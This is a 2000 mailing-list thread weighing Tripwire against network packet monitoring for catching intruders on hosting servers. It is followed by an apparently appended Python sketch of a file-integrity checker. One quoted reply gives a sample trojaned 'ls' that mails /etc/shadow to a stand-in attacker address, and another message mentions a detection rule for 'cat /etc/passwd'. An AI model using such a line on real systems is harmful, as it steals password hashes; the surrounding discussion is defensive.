Re: [cobalt-users] tripwire
- Subject: Re: [cobalt-users] tripwire
- From: "Geoff King" <geoff@xxxxxxxxxx>
- Date: Tue Mar 7 16:19:36 2000
Mark,
Sorry Mark, but my statement is true.
Yes, directories are defined. Perhaps a hacker modifies files outside
/sbin or whatever directories are being monitored? My point was that you
couldn't possibly monitor the entire directory structure on a heavily used
server.
You should take a look again at packet monitoring software. They
monitor for key signatures that would indicate an exploit is being done
(i.e. the remote BIND exploit for example) or the many WU-FTPD exploits or
the many web CGI exploits, etc, etc, etc... I know that Sessionwall-3 does
this as I have used it extensively. I could even write a rule to monitor
for 'cat /etc/passwd' within a telnet session or whatever... No, packet
monitoring software will not tell you whether or not a file has been changed
or modified on a server. However, you would have a log of a user sending/receiving
data that matches a known exploit. Cybercop also has the ability to detect
intrusions and then throw up a bogus server for the hacker to waste his time
on all day thinking they'll get in to some goodie server.
What I was saying about Tripwire is that you will be notified AFTER the
fact that your files have been modified. You will have no indication
beforehand.
This is kind of the same reason people put up security cameras instead
of inventorying all their stuff. It's a heck of a lot easier watching
someone steal something than remembering about the tiny trinket that's been
sitting on the shelf for 3 years. When was the last time you saw it?
Geoff
----- Original Message -----
From: "Mark Spieth" <mspieth@xxxxxxxxxxxx>
To: <cobalt-users@xxxxxxxxxxxxxxx>
Sent: Thursday, March 02, 2000 4:36 PM
Subject: RE: [cobalt-users] tripwire
> Actually this is NOT true. You are supposed to define what directories
> tripwire monitors. You point it to portions of your server that contain
> binary files such as /bin /sbin/ /usr; this is where a hacker is going to do
> things, not in a user's web directory, so the fact that those directories
> change won't affect tripwire.
>
> >>packet sniffing programs like ISS or what my business partner uses
> Sessionwall-3
> This only helps to attempt to track down a user. For example, the Bind hack
> allows someone to gain a root shell via port 53, so as far as your sniffer
> goes, it will probably just see dns traffic. At least if you run tripwire,
> should a hacker modify binaries on your machine, Tripwire will notice the
> fact that the command "ls" has been modified to do this:
>
> cat /etc/shadow |mail haxor@xxxxxxxxxx
> ls
>
>
>
> -----Original Message-----
> From: Geoff King [mailto:geoff@xxxxxxxxxx]
> Sent: Thursday, March 02, 2000 7:31 PM
> To: cobalt-users@xxxxxxxxxxxxxxx
> Subject: Re: [cobalt-users] tripwire
>
>
> Gary,
>
> I have installed Tripwire on a RedHat Linux v5.2 box.
>
> Basically, it's considerably useless on a server that many people use
> because it monitors changes in files, which on a hosting web server, files
> change quite often.
>
> I have found the best means of monitoring hackers is to obtain a stand
> alone server and use packet sniffing programs like ISS or what my business
> partner uses Sessionwall-3. There's a bunch more out there, I can't think
> of their names off the top of my head.
>
> I thought it was kind of a moot point for Tripwire as you'd only know
> after the hacker gained access and modified files. It's much better
> watching the knock at the door first.
>
> Now, if the server is not used for many things, such as a secondary DNS
> server, and that's it, Tripwire would be a fairly decent tool in that you'd
> definitely know if someone was on there and messing with files that should
> never be changed or modified.
>
> The other thing to do is hack your network yourself. I run Nessus, which
> is an open-source security scanner, about once every 6 months to see what it
> can do. It's a good idea to pay attention to the security announcements.
> Any administrator should know exactly where someone can break into their
> network. Also, an administrator should be able to notice odd or different
> behavior of servers and the network fairly quickly.
>
> Anyways, that's my 2 cents worth on tripwire. Good tool, for specific
> purposes. Don't ignore it, but don't count on it either.
>
> Geoff
>
> ----- Original Message -----
> From: "RHLinux" <rhlinux@xxxxxxxxxxx>
> To: "Cobalt-Users@xxxxxxxxxxxxxxx" <cobalt-users@xxxxxxxxxxxxxxx>
> Sent: Thursday, March 02, 2000 2:55 AM
> Subject: [cobalt-users] tripwire
>
>
> > has anyone tried installing tripwire on a raq2-3?
> >
> > it's supposed to help in tracking would-be attackers etc...
> >
> > http://www.zdnet.com/zdnn/stories/news/0,4586,2453339,00.html
> >
> > Gary
> >
> >
> > _______________________________________________
> > cobalt-users mailing list
> > cobalt-users@xxxxxxxxxxxxxxx
> > To Subscribe or Unsubscribe, please go to:
> > http://list.cobalt.com/mailman/listinfo/cobalt-users
> >
>
>
>
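The thread argues over what a file-integrity checker like Tripwire can and cannot see: Mark's point is that it is pointed at system binary directories and flags any change there after the fact, and Geoff's point is that anything outside the monitored directories goes unnoticed. The following Python sketch is an added illustration of that mechanism, not Tripwire's own code and not code from anyone in this thread. It fingerprints every regular file under a configured list of directories (content hash, size and permission bits), stores the result as a baseline, and on a later run reports added, removed and modified files. The `demo()` function builds a constructed temporary tree with a monitored "bin" directory and an unmonitored "www" directory, tampers with both, and returns the report, so you can see exactly which changes a directory-scoped integrity check catches and which it silently misses.

```python
"""Tripwire-style file integrity check (added illustration, not Tripwire's code)."""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path


def fingerprint(path: Path) -> dict:
    """Attributes an integrity checker compares: content hash, size and permission bits."""
    st = path.lstat()
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {"sha256": digest.hexdigest(), "size": st.st_size, "mode": stat.S_IMODE(st.st_mode)}


def build_baseline(monitored_dirs) -> dict:
    """Walk only the configured directories (the Tripwire policy, e.g. /bin, /sbin, /usr).

    Files outside these directories are never fingerprinted, so changes to them are invisible.
    """
    baseline = {}
    for directory in monitored_dirs:
        for root, _dirs, files in os.walk(directory):
            for name in files:
                path = Path(root) / name
                if path.is_file() and not path.is_symlink():
                    baseline[str(path)] = fingerprint(path)
    return baseline


def save_baseline(baseline: dict, db_path: Path) -> None:
    """Persist the baseline. A real deployment keeps this database on read-only or offline
    media, since an attacker who can rewrite it can hide the tampering it is meant to catch."""
    db_path.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(db_path: Path) -> dict:
    return json.loads(db_path.read_text())


def check(baseline: dict, monitored_dirs) -> dict:
    """Re-fingerprint the monitored tree and diff it against the stored baseline."""
    current = build_baseline(monitored_dirs)
    known, seen = set(baseline), set(current)
    return {
        "added": sorted(seen - known),
        "removed": sorted(known - seen),
        "modified": sorted(p for p in known & seen if current[p] != baseline[p]),
    }


def demo() -> dict:
    """Constructed scenario: monitor 'bin' only, then tamper inside and outside it."""
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir, www_dir = Path(tmp) / "bin", Path(tmp) / "www"
        bin_dir.mkdir()
        www_dir.mkdir()
        ls = bin_dir / "ls"
        ls.write_bytes(b"#!/bin/sh\nexec /bin/ls \"$@\"\n")
        page = www_dir / "index.html"
        page.write_text("<h1>customer site</h1>")

        db = Path(tmp) / "tripwire.db"
        save_baseline(build_baseline([bin_dir]), db)

        # Changes after the baseline: one replaced binary, one new file in the monitored
        # tree, and routine customer edits in the unmonitored web tree.
        ls.write_bytes(b"#!/bin/sh\necho replaced\n")
        (bin_dir / "newtool").write_bytes(b"#!/bin/sh\n")
        page.write_text("<h1>customer site, updated</h1>")

        report = check(load_baseline(db), [bin_dir])
        return {
            "added": [Path(p).name for p in report["added"]],
            "removed": [Path(p).name for p in report["removed"]],
            "modified": [Path(p).name for p in report["modified"]],
            "www_change_reported": str(page) in report["modified"],
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Running it reports `ls` as modified and `newtool` as added, and nothing at all about `index.html`: the web tree was never in the policy, which is exactly why the check stays quiet on a busy hosting server and exactly why it says nothing about an intruder who only touches files outside the monitored directories. It also only ever speaks after the baseline has been compared, which is the "after the fact" property the thread debates; the network-signature tools Geoff describes look at a different layer and are complementary, not a substitute.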